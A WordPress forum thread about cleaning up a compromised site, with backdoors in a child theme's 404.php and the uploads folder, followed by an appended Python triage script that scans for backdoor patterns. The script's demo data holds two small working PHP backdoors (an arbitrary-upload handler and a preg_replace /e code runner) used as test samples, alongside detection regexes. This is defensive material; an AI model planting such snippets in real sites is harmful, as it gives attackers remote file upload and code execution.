Forum Replies Created

Viewing 4 replies - 1 through 4 (of 4 total)
  • Thread Starter adamprato

    (@adamprato)

    I see how dumb a move that is now.

    Thread Starter adamprato

    (@adamprato)

    Kimmo and I found the root cause of the problem. The problem was a bogus 404.php in the child theme. The 404 handler was providing people with a means to upload arbitrary files.

    <?php
    [code moderated]...';
    }
    ;?>

    I'll submit this and all of the new backdoors Wordfence didn't find to Wordfence support.

    Thread Starter adamprato

    (@adamprato)

    Okay, so there’s a TON of stuff Wordfence isn’t finding. The public_html is littered with junk, relatively new. People seem to be uploading stuff via this thing: dl-nagano-vodki-naidu-skachat-320-kbit

    That wasn’t there in a previous version of the site but, whatever. I have more things to clean up for now. At this point I can’t ask why this is happening because the entire site is littered with crap.

    Just a small sample of the directory listing showing the new problem (not related to the original topic):

    sftp> cd public_html
    sftp> ls
    -_IqRMleiPw.jpg
    00074.MTS
    00075.MTS
    03c3b473d21abf2552da82e5faea60bd
    07.jpg
    1291360193_E5EBEAE020EDE020EAF0E0F1EDEEEC20F4EEEDE5.jpg
    131_Ardinvest– (1).m3u
    139
    1419884578486.jpg
    2014-12-13 12.56.44.jpg
    20141226_152525.jpg
    224895558398_01432f433c05e0cae01b2ab08b37a9ba.jpg
    228.php
    23.docx

    All I know is that there’s something Wordfence isn’t finding that put that download script in place.

    If anyone is interested, I’m backing up the site before I go on a mass cleanse.

    Thread Starter adamprato

    (@adamprato)

    Okay, thanks for pointing that out Kimmo.

    Dan, I’ll look into changing that as well. No sense in spamming the access logs unnecessarily.

    Tim, I removed 70+ backdoors by hand. Then I installed Wordfence and found one last backdoor I hadn’t known about (I didn’t know about the preg() obfuscation until then). I’ve run the Sucuri scanner and wpscan, and we have the pro version of Wordfence that does external checks as well.

    Kimmo, I’ll look through the logs again and try to piece together when these things appeared.
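
The two things adamprato describes doing by hand above, listing what appeared in public_html after the last known-good state and grepping PHP files for the upload handler hidden in the child theme's 404.php and for preg_replace() /e obfuscation, are shown below as an added example. This is not code from the thread, from Wordfence, or from any of the scanners mentioned; the sample files, paths and the "deploy" timestamp are constructed for the demo and only stand in for what the thread describes.

```python
"""Triage helpers for a compromised WordPress tree: list files newer than the last
known-good deploy, and grep PHP files for the backdoor patterns discussed above."""
import os
import re
import tempfile

# Grep-style indicators. Hits are leads, not verdicts: legitimate plugins also call
# these functions, so every hit still has to be read by a human.
INDICATORS = [
    ("eval of decoded/obfuscated payload",
     re.compile(r"\beval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(", re.I)),
    ("file upload handler",
     re.compile(r"move_uploaded_file\s*\(|\$_FILES\s*\[", re.I)),
    ("write of request-controlled data",
     re.compile(r"(file_put_contents|fwrite)\s*\([^;]*\$_(GET|POST|REQUEST|COOKIE)", re.I)),
    ("dynamic function call from request data",
     re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\[[^\]]*\]\s*\(")),
]

# First argument of a preg_replace() call when it is a plain quoted literal.
PREG_CALL = re.compile(r"preg_replace\s*\(\s*(['\"])(.*?)\1", re.S)
BRACKET_DELIMS = {"(": ")", "[": "]", "{": "}", "<": ">"}

def preg_has_e_modifier(source):
    """True if any preg_replace() pattern literal carries the /e modifier, which made
    PHP eval() the replacement string (removed in PHP 7). Patterns assembled from
    chr() or concatenation are not seen here; the broader indicators cover those."""
    for m in PREG_CALL.finditer(source):
        pattern = m.group(2)
        if not pattern:
            continue
        close_delim = BRACKET_DELIMS.get(pattern[0], pattern[0])
        end = pattern.rfind(close_delim)
        if end > 0 and "e" in pattern[end + 1:]:
            return True
    return False

def scan_file(path):
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        source = fh.read()
    hits = [name for name, rx in INDICATORS if rx.search(source)]
    if preg_has_e_modifier(source):
        hits.append("preg_replace with /e modifier")
    return hits

def scan_tree(root):
    """Map relative path -> indicator names, for every PHP file with at least one hit."""
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if not fn.lower().endswith((".php", ".phtml", ".php5", ".inc")):
                continue
            full = os.path.join(dirpath, fn)
            hits = scan_file(full)
            if hits:
                findings[os.path.relpath(full, root).replace(os.sep, "/")] = hits
    return findings

def files_newer_than(root, since):
    """Relative paths of files modified after `since` (Unix timestamp). mtime is
    attacker-settable (touch), so this finds sloppy drops; it cannot prove a file clean."""
    out = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            full = os.path.join(dirpath, fn)
            if os.stat(full).st_mtime > since:
                out.append(os.path.relpath(full, root).replace(os.sep, "/"))
    return sorted(out)

# --- Constructed sample tree (stand-ins, not real site content) -------------------
DEPLOY_TS = 1_419_000_000  # constructed "last known-good deploy" timestamp
PLANTED = {
    # Stand-in for the bogus child-theme 404.php the thread describes: a "template"
    # that accepts an upload from anyone who triggers a 404.
    "wp-content/themes/child/404.php":
        "<?php\nif (isset($_FILES['f'])) {\n"
        "    move_uploaded_file($_FILES['f']['tmp_name'], __DIR__ . '/' . $_FILES['f']['name']);\n"
        "}\nget_header(); ?>\n<h1>Not found</h1>\n<?php get_footer();\n",
    # Stand-in for a preg_replace /e dropper, the "preg() obfuscation" mentioned above.
    "wp-content/uploads/2014/12/cache.php":
        "<?php\n@preg_replace('/.*/e', @$_REQUEST['x'], '');\n",
}
CLEAN = {
    "wp-content/themes/child/header.php": "<?php wp_head(); ?>\n<body>\n",
    # preg_replace without /e must not be flagged.
    "wp-content/plugins/ok/ok.php": "<?php\necho preg_replace('/\\s+/', ' ', $text);\n",
}

def build_demo_tree():
    """Write the samples to a temp dir; planted files get a post-deploy mtime,
    clean ones a pre-deploy mtime. Returns (root, DEPLOY_TS)."""
    root = tempfile.mkdtemp(prefix="wp-triage-")
    for group, stamp in ((PLANTED, DEPLOY_TS + 86400), (CLEAN, DEPLOY_TS - 86400)):
        for rel, body in group.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(body)
            os.utime(full, (stamp, stamp))
    return root, DEPLOY_TS

if __name__ == "__main__":
    root, since = build_demo_tree()
    for path in files_newer_than(root, since):
        print("newer than deploy:", path)
    for path, hits in sorted(scan_tree(root).items()):
        print(path, "->", "; ".join(hits))
```

On a real site point scan_tree() and files_newer_than() at the document root instead of the demo tree, and compare the result against a known-good backup or the WordPress core checksums rather than trusting mtimes alone: a dropper that runs `touch -r` on a neighbouring file will not show up in the newer-than list, and the indicator grep deliberately over-matches so that the hits get read rather than filtered.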
